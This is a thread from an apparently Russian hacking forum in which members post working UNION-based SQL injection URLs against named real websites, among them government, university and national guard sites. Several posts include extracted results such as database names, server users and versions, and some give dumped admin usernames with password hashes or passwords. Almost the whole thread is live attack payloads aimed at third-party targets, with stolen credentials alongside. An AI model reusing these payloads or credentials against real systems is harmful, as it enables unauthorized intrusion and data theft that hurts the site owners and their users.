SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.auction.spb.ru/?lotID=16209+and+0+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,login,password,email),12,13,14,15,16,17,18,19,20,21+from+users
     
    _________________________
    1 person likes this.
  2. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    http://www.specialradio.ru/mkz/?id=-5+union+select+1,2,3,group_concat(version(),database(),user()),5,6,7,8,9--
     
  3. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.florenceforfun.org/index.php?id=%28select%201%20from%20%28select%20count%280%29,concat%28%28select%20version%28%29%29,floor%28rand%280%29*2%29%29%20from%20information_schema.tables%20group%20by%202%20limit%201%29a%29
    version :5.1.53-0.dotdeb.01
    database :'mySql9296_fff1'
    user : [email protected]

    Code:
    h ttp://www.mete.gov.al/galeri_info.php?l=a&p=44&ida=-2+union+select+1,2,3,concat_ws%28database%28%29,0x 3a,version%28%29,0x3a,user%28%29%29,5,6
    database :web192db1
    version: 5.0.77
    user : web192u1@localhost

    Code:
    http://howtoremovecar.co.nz/gallery-main.php?gid=-5+union+select+1,2,group_concat%280x3a,username,0x3a,password%29,4,5+from+admin_mst
    admin:0f6969d7052da9261e31ddb6e88c136e :remove

    Code:
    http://www.meggitttrainingsystems.com/main.php?id=42+union+select+1,concat%280x3a,username,0x3a,password%29,3,4,5,6+from+fulfillment_users
    [email protected]:meggitt

    Code:
    http://freecarremovals.co.nz/gallery-main.php?gid=-5+union+select+1,2,group_concat%280x3a,username,0x3a,password%29,4,5+from+admin_mst
    :admin:5797b26ee425c46a1de0a741885dcc0a :removals
     
    #13603 bloodAngel, 28 Feb 2011
    Last edited: 28 Feb 2011
    1 person likes this.
  4. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://www.creativephotographyinc.biz/page.php?pID=null+and+1=2+union+select+1,2,3,4
     
  5. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Code:
    h**p://www.mymym.com/en/gbook.php?owner=1+union+select+1,2,3--
    Version: 5.0.51a-24+lenny5
    Database: [email protected]
    User: meetyourmakers_www
     
  6. anII

    anII New Member

    Joined:
    1 Mar 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    http://www.automotorplex.com/page.php?id=1+union+select+1,database(),3,4,5
    user:automoto_dbadmin@localhost
    ver:4.1.22-standard
    base:automoto_AMP

    http://nwmetalcraft.com/manufacturer-page.php?Id=-22+union+select+1,2,3,4,user(),6,7
    user:[email protected]
    base:nwmetalcraft
    datadir:/var/lib/mysql_data/3/
    ver:5.0.91-log

    http://www.wizardbrazleme.com.br/new/page.php?id=-1+union+select+1,2,3
    user:[email protected]
    base:wizardbrazleme
    version:5.1.52

    http://www.marcosdan.com.br/page.php?id=-1+union+select+1,2,3
    user:[email protected]
    base:marcosdan
    version:5.1.52

    http://www.segundoidioma.com/page.php?Id=-1+union+select+1,2,3
    user:segundoi_raiz@localhos
    base:segundoi_osc1
    version:5.0.91-community
     
  7. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Code:
    http://www.gisa.ru/info_see.php?id=-528+UNION+SELECT+1,email,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+secur_users+limit+1,5+--+
    Code:
    http://www.libroslibertad.ca/book.php?id=20+and+1=0+union+select+1,pwd,3,4,5,6,7,8+from+users+--+
    Code:
    http://www.thedailybull.ca/article.php?id=-128+union+select+1,2,3,user_password,5,6,7,8,9,10+from+phpbb_users+limit+1,15+--
    Code:
    http://esilibrary.ca/esi/newsitem.php?id=-140+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9+--+
     
  8. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Говермент

    Буяка бу!!!

    http://ojj.la.gov/index.php?page=sub&id=-25/**//*!union*//**//*!select*/1,2,3,user%28%29,5,6,7,8,9--+

    user:ojj_new@localhost
     
  9. anII

    anII New Member

    Joined:
    1 Mar 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    http://www.eskjaer-aa.dk/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9

    http://www.paneltech.dk/page.php?page=99&id=-1+union+select+version(),2,3

    http://www.delbeckvignobles.com/page.php?id=1+union+select+1,2,version(),4,5,6

    http://www.manieres-de.com/page.php?id=1+union+select+1,2

    http://lologogo.free.fr/page.php?id=1+union+select+1,2,3,4,5,6,7,8
     
  10. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    shams7.com
    Code:
    http://www.shams7.com/vbzoom/show.php?UserID=1&MainID=81&SubjectID=-14003 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 --

    sportsnetsales.ca

    PR 5
    DB: snetsales
    Code:
    http://www.sportsnetsales.ca/show.php?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 --

    rakedance.com

    Сайт связанный с покером
    rakedanc_rakedan@localhost:5.1.47-community-log:rakedanc_rakedance
    Code:
    http://www.rakedance.com/newsarc/show.php?id=-1 union select concat_ws(0x3a,user(),version(),database()) --

    4nieuws.nl
    Code:
    http://4nieuws.nl/show.php?key=-24074 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12 --

    billigehjemmesider.dk
    DB: mysqluser14261
    Слепая
    Code:
    http://demo.billigehjemmesider.dk/show.php?p=-104 union select user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --
     
  11. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    www.walsh.edu PR-5

    Code:
    http://www.walsh.edu/athleticsdetail.php?newsid=-874+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
    Code:
    5.0.77:walsh@localhost:Walsh
    www.minnesotanationalguard.org PR-5

    Code:
    http://www.minnesotanationalguard.org/press_room/e-zine/articles/index.php?item=-484+UnIon+selECt+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
    Code:
    5.0.77-log:ng_internet@localhost:ng_internet
    cit.mak.ac.ug PR-6

    Code:
    http://cit.mak.ac.ug/news_detail.php?item=-191+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6+--+
    Code:
    5.0.91-community:citmak_dbcit@localhost:citmak_fcit
     
  12. anII

    anII New Member

    Joined:
    1 Mar 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    https://www.kisantech.com/index.php?cat_id=1+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10--
     
  13. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    175
    Likes Received:
    250
    Reputations:
    27
    http://www.medtehnika.org/catalog.php?id=-123+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13+--
    Пр: 2
     
  14. 3Mind

    3Mind Member

    Joined:
    16 Aug 2009
    Messages:
    58
    Likes Received:
    7
    Reputations:
    0
    Code:
    [COLOR=YellowGreen]http://www[COLOR=DarkRed][dot][/COLOR]switch-foot[COLOR=DarkRed][dot][/COLOR]com/view_item.php?item_id=-25+union+select+1,2,concat_ws(0x3b,username,password)+from+switchfoot.admin_table+--+[/COLOR]
    Code:
    [COLOR=YellowGreen]http://shop[COLOR=DarkRed][dot][/COLOR]bsens[COLOR=DarkRed][dot][/COLOR]com/bsens/index.php?param=item&item_id=-114'+union+select+1,2,concat_ws(0x3b,user_name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+bsens_db.user_admin+--+&item_type_code=1&category_id=9&[/COLOR]
     
    #13614 3Mind, 7 Mar 2011
    Last edited: 7 Mar 2011
  15. DarkDante

    DarkDante Banned

    Joined:
    24 Dec 2004
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    http://meander.ca/lyrics.php?key=song_title&ID=-78+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4--
     
  16. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://www.almeidahotels.com/nm_quemsomos.php?id=-25/**/union/**/select/**/1,2,3,4,user(),6,7,8/*
     
  17. anII

    anII New Member

    Joined:
    1 Mar 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    http://www.worstpreviews.com/review.php?id=115+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+
    os:unknown-freebsd7.2
    basedir:/usr/local/
    base:alexgi_worstreview
    tmpdir:/usr/tmp
    datadir:/usr/local/var/
    user:alexgi_2@localhost
    ver:5.0.91-log

    http://www.nowt2do.co.uk/review.php?id=606+and+1=0+union+select+1,2--+
    basedir:/
    tmpdir:/tmp/
    user:nowt2do@localhost
    ver:5.0.92-community
    datadir:/var/lib/mysql/
    os:pc-linux-gnu

    http://www.dvdholocaust.com/review.php?id=289+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
    basejdvdholodvdholo
    userjdvdholonakedralocalhost
    ospclinuxgnu
    ver4122standard

    http://www.paperbackreader.com/review.php?ReviewID=2113+and+1=0+union+select+1,2,3,4,5,6,7,8,9--+

    ver:5.0.91-log
    user:p[email protected]
    base:pbrmain
    basedir:/usr/local/mysql-5.0.91-linux-x86_64-icc-glibc23/
    datadir:/var/lib/mysql_data/1/
    tmpdir:/tmp/mysqltmp/
    os:unknown-linux-gnu
     
    #13617 anII, 7 Mar 2011
    Last edited: 7 Mar 2011
  18. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    cypee.com
    Регистратор
    Code:
    http://cypee.com/photo/show.php?title=Arashdeep_Singh&id=-1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4 --
    
    tvchaty.com
    rain@localhost:5.0.51a-community:rain_tvchaty
    Code:
    http://tvchaty.com/show.php?id=-1 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6 --
    externat.kspu.ru
    Code:
    http://externat.kspu.ru/forum/thread.php?threadid=-304 union select 1 --


    forumer.com
    Code:
    http://fireandwater.1.forumer.com/index.php?showtopic=-591 order by 1 --
    nethands.de
    Code:
    http://www.nethands.de/pys/show.php?id=165&skin=-5 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 --
     
    #13618 Fooog, 8 Mar 2011
    Last edited: 8 Mar 2011
    1 person likes this.
  19. yesk88

    yesk88 New Member

    Joined:
    7 Mar 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    bmz.fr
    Code:
    http://www.bmz.fr/achat/index.php?catid=-11+union+select+1,version(),3,4%20--
    seaandsea.fr
    Code:
    http://www.seaandsea.fr/achat/index.php?catid=-43+union+select+1,version()%20--
    protek.fr
    Code:
    http://www.protek.fr/achat/index.php?catid=-63+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20--
    saint-vrain91.fr
    Code:
    http://www.saint-vrain91.fr/rubrique.php?catId=-41+union+select+unhex(hex(version())),2,3,4,5%20--
    fape.fr
    Code:
    http://www.fape.fr/lire/index.php?catid=3+and+1=2+union+select+1,2,group_concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20--
     
  20. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Code:
    http://cgi.stanford.edu/~dept-ctl/tomprof/posting.php?ID=-752+union+select+1,2,3,4,5,6--
    
     
    1 person likes this.
Thread Status:
Not open for further replies.